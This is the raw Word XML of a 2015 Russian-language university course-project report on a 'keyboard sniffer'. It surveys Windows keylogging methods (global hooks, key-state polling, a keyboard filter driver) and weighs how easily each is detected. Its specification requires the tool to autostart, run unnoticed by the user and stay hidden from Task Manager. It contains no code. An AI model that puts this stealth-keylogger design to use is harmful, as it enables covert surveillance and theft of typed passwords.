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05" w:rsidRPr="00304E7C" w:rsidRDefault="00430205" w:rsidP="00430205">
      <w:pPr>
        <w:ind w:left="-567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0005640E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Министерство образования Республики Беларусь</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430205" w:rsidRPr="00304E7C" w:rsidRDefault="00430205" w:rsidP="00430205">
      <w:pPr>
        <w:ind w:left="-567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00430205" w:rsidRPr="00304E7C" w:rsidRDefault="00430205" w:rsidP="00430205">
      <w:pPr>
        <w:spacing w:before="120"/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Учреждение образования </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430205" w:rsidRPr="00833844" w:rsidRDefault="00430205" w:rsidP="00430205">
      <w:pPr>
        <w:spacing w:before="120"/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Б</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ЕЛОРУССКИЙ ГОСУДАРСТВЕННЫЙ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НИВЕРСИТЕТ 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>ИНФОРМАТИКИ И РАДИОЭЛЕКТРОНИКИ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Факультет компьютерных систем и сетей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электронных вычислительных машин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Дисциплина: </w:t>
      </w:r>
      <w:r w:rsidRPr="00304553">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Системное программное обеспечение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вычислительных  машин</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00833844">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>СПОВМ</w:t>
      </w:r>
      <w:r w:rsidRPr="00833844">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>)</w:t>
      </w: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ПОЯСНИТЕЛЬНАЯ ЗАПИСКА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к курсово</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>му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>проекту</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430205" w:rsidRPr="00304E7C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на тему</w:t>
      </w:r>
      <w:r w:rsidRPr="00304E7C">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>: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304553" w:rsidRDefault="00430205" w:rsidP="00430205">
      <w:pPr>
        <w:ind w:left="-567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304553">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Сниффер клавиатуры</w:t>
      </w:r>
      <w:r w:rsidRPr="00304553">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>»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8372C">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">                                </w:t>
      </w:r>
      <w:r w:rsidRPr="00833844">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Студент:  гр.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3505</w:t>
      </w:r>
      <w:r w:rsidRPr="0084220F">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="008422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Шешко В.Р.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Pr="00833844">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Руководитель:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E4AC0">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">   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Яночкин А.Л.</w:t>
      </w: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4220F">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Минск 201</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E8372C" w:rsidRDefault="00E8372C">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E8372C" w:rsidRPr="00ED0D64" w:rsidRDefault="00E8372C" w:rsidP="00E8372C">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED0D64">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Содержание</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C1400" w:rsidRDefault="009C14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o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc414805627" w:history="1">
        <w:r w:rsidRPr="00F22EE6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0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1400" w:rsidRDefault="0039381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28" w:history="1">
        <w:r w:rsidR="009C1400" w:rsidRPr="00F22EE6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.Обзор литературы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28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4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39381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29" w:history="1">
        <w:r w:rsidR="009C1400" w:rsidRPr="00F22EE6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2. Техническое задание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29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6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39381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30" w:history="1">
        <w:r w:rsidR="009C1400" w:rsidRPr="00F22EE6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Заключение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30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7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39381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31" w:history="1">
        <w:r w:rsidR="009C1400" w:rsidRPr="00F22EE6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>Список литературы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31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8</w:t>
        </w:r>
        <w:r w:rsidR="009C1400">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E8372C" w:rsidRDefault="009C1400" w:rsidP="00E8372C">
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E8372C" w:rsidRDefault="00E8372C" w:rsidP="00205E97">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005478C2" w:rsidRPr="00E47FA2" w:rsidRDefault="005478C2" w:rsidP="005478C2">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc414805627"/>
      <w:r w:rsidRPr="00E47FA2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Введение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="005478C2" w:rsidRDefault="005478C2" w:rsidP="005478C2">
      <w:pPr>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pP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, в котором живет современный человек, характеризуют как информационное. Компьютеры получают все более широкое применение – даже там, где, как казалось совсем недавно, их применить невозможно. Информационные технологии и их знание становится неотъемлемой частью жизни любого человека, и в основу применения этих технологий также легло применение компьютера. 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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сегодня большая часть работы выполняется с использованием компьютера: электронных документов, файлов, программ и сайтов. Неудивительно, что хронометраж рабочего времени за компьютером так популярен сейчас. С его помощью можно проанализировать рабочий процесс и выявить резервы времени.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rStyle w:val="a6"/>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Учет деятельности за компьютером</w:t>
      </w:r>
      <w:r w:rsidRPr="00640A3A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — дешевый и полностью объективный способ. Он идеально подходит для офисного персонала, который большую часть времени проводит на рабочем месте</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> за компьютером</w:t>
      </w:r>
      <w:r w:rsidRPr="00640A3A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005478C2" w:rsidRPr="00640A3A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фферы клавиатуры</w:t>
      </w:r>
      <w:r w:rsidRPr="005478C2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> принадлежат к той группе программных продуктов, которые осуществляют контроль над деятельностью пользователя персонального компьютера.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> П</w:t>
      </w:r>
      <w:r w:rsidRPr="005478C2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>рограммные про</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дукты этого типа предназначаются</w:t>
      </w:r>
      <w:r w:rsidRPr="005478C2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> исключительно для записи информации о нажатиях клавиш клавиатуры, в том числе и системных, в специализированный журнал регистрации (лог-файл</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>), который впоследствии изучается</w:t>
      </w:r>
      <w:r w:rsidRPr="005478C2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> человеком, установившим эту программу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00532646" w:rsidRDefault="00532646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:rsidR="009C1400" w:rsidRPr="009C1400" w:rsidRDefault="009C1400" w:rsidP="009C1400"/>
    <w:p w:rsidR="00A9269C" w:rsidRPr="00E47FA2" w:rsidRDefault="00E47FA2" w:rsidP="00A9269C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зор литературы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E593B" w:rsidRDefault="008E593B" w:rsidP="00F97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будут рассмотрены основные теоретические сведения, необходимые для создания программы «Сниффер клавиатуры».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00532646" w:rsidRPr="00532646" w:rsidRDefault="00532646" w:rsidP="00F97D6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00532646" w:rsidRPr="00A9269C" w:rsidRDefault="00532646" w:rsidP="00F97D6F">
      <w:pPr>
        <w:pStyle w:val="ae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532646">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Спецификация клавиатурных снифферов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00532646" w:rsidRDefault="00532646" w:rsidP="00F97D6F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532646">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Клавиатурный сниффер — это программное обеспечение или аппаратн</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ое устройство, регистрирующее </w:t>
      </w:r>
      <w:r w:rsidRPr="00532646">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нажатия </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>клавиш на клавиатуре компьютера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00532646" w:rsidRDefault="00532646" w:rsidP="00F97D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виатурные снифферы подразделяются на </w:t>
      </w:r>
      <w:r w:rsidR="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">аппаратные и программные. </w:t>
      </w:r>
      <w:r w:rsidR="008F6440" w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Первые представляют собой небольшие устройства, которые могут быть закреплены на клавиатуре, проводе или в системном блоке компьютера. Вторые — это специально написанные программы, предназначенные для отслеживания нажатий клавиш на клавиатуре и ведения журнала нажатых клавиш.</w:t>
      </w:r>
      <w:r w:rsidR="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Принципиальная идея сниффера</w:t>
      </w:r>
      <w:r w:rsidR="008F6440" w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> состоит в том, чтобы внедриться между любыми двумя звеньями в цепи прохождения сигнала от нажатия пользователем клавиш на клавиатуре до появления символов на экране</w:t>
      </w:r>
      <w:r w:rsidR="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F6440" w:rsidRPr="008F6440" w:rsidRDefault="008F6440" w:rsidP="00F97D6F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 Наиболее популярные технические подходы к по</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>строению программных клавиатурных снифферов</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F6440" w:rsidRPr="008F6440" w:rsidRDefault="008F6440" w:rsidP="00F97D6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системная ловушка на сообщения о нажатии клавиш клавиатуры (устанавливается с помощью функции WinAPI SetWindowsHook, для того чтобы перехватить сообщения,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> посылаемые оконной процедуре.</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F6440" w:rsidRPr="008F6440" w:rsidRDefault="008F6440" w:rsidP="00F97D6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циклический опрос клавиатуры (с помощью функции WinAPI Get(Async)KeyState, GetKeyboardSta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>te).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F6440" w:rsidRDefault="008F6440" w:rsidP="00F97D6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драйвер-фильтр стека клавиатурных драйвер</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ов ОС Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F6440" w:rsidRDefault="008F6440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 xml:space="preserve">Кейлоггеры могут внедряться в любом месте последовательности обработки, перехватывая данные о нажатых клавишах, передаваемые одной подсистемой обработки следующей подсистеме в цепочке обработчиков. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B3D75" w:rsidRDefault="006B3D75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</w:p>
    <w:p w:rsidR="008F6440" w:rsidRDefault="008F6440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Установка ловушки для клавиатурных сообщений</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F6440" w:rsidRPr="008F6440" w:rsidRDefault="00F97D6F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F6440" w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>то самый распространен</w:t>
      </w:r>
      <w:r w:rsidR="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ный метод реализации клавиатурных снифферов</w:t>
      </w:r>
      <w:r w:rsidR="008F6440" w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Посредством вызова функции SetWindowsHookEx </w:t>
      </w:r>
      <w:r w:rsidR="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сниффер</w:t>
      </w:r>
      <w:r w:rsidR="008F6440" w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> устанавливает глобальную ловушку на клавиатурные соб</w:t>
      </w:r>
      <w:r w:rsidR="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ытия для всех потоков в системе. </w:t>
      </w:r>
      <w:r w:rsidR="008F6440" w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Фильтрующая функция ловушки в этом случае располагается в отдельной динамической библиотеке, которая внедряется во все процессы системы, занимающиеся обработкой сообщений. При выборке из очереди сообщений любого потока клавиатурного сообщения система вызовет уст</w:t>
      </w:r>
      <w:r w:rsidR="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ановленную фильтрующую функцию.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F6440" w:rsidRPr="008F6440" w:rsidRDefault="008F6440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 xml:space="preserve">  К достоинствам этого метода перехвата относится простота и гарантированный перехват всех нажатий клавиатуры, из недостатков можно отметить необходимость наличия отдельного файла динамической библиотеки и относительную простоту обнаружения по причине внедрения во все системные процессы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00532646" w:rsidRPr="006B3D75" w:rsidRDefault="006B3D75" w:rsidP="00F97D6F">
      <w:pPr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Использование циклического опроса состояния клавиатуры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Состояние всех клавиш с небольшим интервалом опрашивается с помощью функций GetAsynсKeyState или GetKeyState. Данные функции возвращают массивы асинхронного или синхронного сос</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тояния клавиш</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>; анализируя их, можно понять, какие клавиши были нажаты или отпущены после последнего опроса.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 xml:space="preserve">Достоинства данного метода — предельная простота реализации, отсутствие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">дополнительного модуля </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>недостатки — отсутствие гарантии обнаружения всех нажатий, могут быть пропуски; легко обнаруживается мониторингом процессов, опрашивающих клавиатуру с высокой частотой.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Использование драйвер-фильтра драйвера класса клавиатуры Kbdclass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B3D75" w:rsidRP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Документированный в DDK способ перехвата</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Снифферы</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, построенные на основе этого метода, перехватывают запросы к клавиатуре посредством установки фильтра поверх устройства «\Device\KeyboardClass0»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, созданного драйвером Kbdclass. </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Фильтруются только запросы типа IRP_MJ_READ, поскольку именно они позволяют получить ко</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ды нажатых и отпущенных клавиш.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Достоинства — гарантированный перехват всех нажатий, невозможность обнаруж</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ения без использования драйвера</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Недостатки — необходимость установки собственного драйвера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A65973" w:rsidRPr="00743E0B" w:rsidRDefault="00A65973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средств для разработки приложения необходимо учесть множество различных аспектов, наиболее важным из которых является язык программирования, так как он в значительной степени определяет другие доступные средства.</w:t>
      </w:r>
      <w:r w:rsidR="00743E0B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для реализации клавиатурного сниффера наиболее эффективным будет использование языков программирования </w:t>
      </w:r>
      <w:r w:rsidR="00743E0B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C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</w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidR="00743E0B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00743E0B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>++.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</w:rPr>
        <w:t xml:space="preserve">Они предоставляют все средства для создания приложения для операционных систем семейства </w:t>
      </w:r>
      <w:r w:rsidR="00743E0B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="00743E0B" w:rsidRPr="00743E0B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B3D75" w:rsidRPr="00532646" w:rsidRDefault="006B3D75" w:rsidP="00532646">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00532646" w:rsidRDefault="00532646" w:rsidP="00532646">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00532646" w:rsidRDefault="00532646">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E47FA2" w:rsidRPr="00E47FA2" w:rsidRDefault="00E47FA2" w:rsidP="00E47FA2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ическое задание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 Общие сведения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0026">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Название: «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Сниффер клавиатуры». </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00383DC8" w:rsidRPr="00E76874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Сниффер клавиатуры» − программа для слежения за активностью пользователя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 Назначения и цели программного средства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0026">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Назначения: программа предназначена для</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> отслеживания нажатия клавиш на клавиатуре, а также отслеживания изменения активного окна</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0026">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. 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: повышение производительности сотрудников на работе, при помощи контроля их активности. Родительский контроль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 Требования к программному средству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программа должна вести мониторинг клавиатуры, отслеживать активные окна, активные вкладки в браузерах. Программа автоматически </w:t>
      </w:r>
      <w:r w:rsidR="00FF48D5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>запускается</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> пр</w:t>
      </w:r>
      <w:r w:rsidR="00FF48D5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и загрузке компьютера и работает</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> незаметно для пользователя. Программа не должна отображаться в Диспетчере задач. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00383DC8" w:rsidRPr="00ED0D64" w:rsidRDefault="00383DC8" w:rsidP="00E8372C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0070493C" w:rsidRDefault="0070493C" w:rsidP="00532646">
      <w:pPr>
        <w:jc w:val="both"/>
